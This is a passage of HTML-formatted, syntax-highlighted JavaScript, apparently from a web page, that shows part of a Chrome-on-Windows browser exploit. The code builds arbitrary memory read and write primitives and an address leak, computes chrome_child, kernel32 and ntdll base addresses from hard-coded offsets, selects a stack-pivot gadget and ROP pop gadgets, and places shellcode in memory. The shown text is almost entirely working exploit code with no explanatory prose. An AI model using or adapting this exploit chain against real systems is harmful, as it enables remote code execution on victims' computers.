class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-174\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-175\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-176\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bd7875724109470309230-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">leakMe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">props<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-186\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">props<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-187\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-188\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-189\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-190\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">div<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#039;div&#039;<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-191\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">div_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">div<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-192\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/alert(&#8216;div_addr = &#8216; + hex(div_addr));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-193\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">div_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-194\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span 
class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-195\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-196\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x40b5f20n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-197\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/print(&#8216;chrome_child @ &#8216; + hex(chrome_child));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-198\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ CreateEventW<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-199\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4771260n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20750n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-200\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/print(&#8216;kernel32 @ &#8216; + hex(kernel32));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-201\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ NtQueryEvent<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-202\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x79208n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x9a9a0n<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-203\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/print(&#8216;ntdll @ &#8216; + hex(ntdll));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-204\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-205\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-206\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f0705 488b5150&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;&nbsp;&nbsp;&nbsp; rdx,qword ptr [rcx+50h]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-207\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f0709 488b6918&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;&nbsp;&nbsp;&nbsp; rbp,qword ptr [rcx+18h]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-208\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f070d 488b6110&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;&nbsp;&nbsp;&nbsp; rsp,qword ptr [rcx+10h]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-209\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f0711 ffe2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jmp&nbsp;&nbsp;&nbsp;&nbsp; rdx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-210\"><span 
class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-211\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-212\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xA0705n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-213\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/let gadget = 0x41414141n;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-214\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-215\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-216\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x36a657n<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop rcx ; ret&nbsp;&nbsp;&nbsp;&nbsp; 59 c3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-217\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x9962n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop rdx ; ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 5a c3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-218\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xc72852n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop r8 ; ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;41 58 c3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-219\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xc51425n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop r9 ; ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;41 59 c3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-220\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-221\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-222\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-223\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-224\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">sc_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20000n<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0x1000n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-225\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">sc_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sc_offset<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-226\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u8<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">Number<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sc_offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-227\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-228\"><span 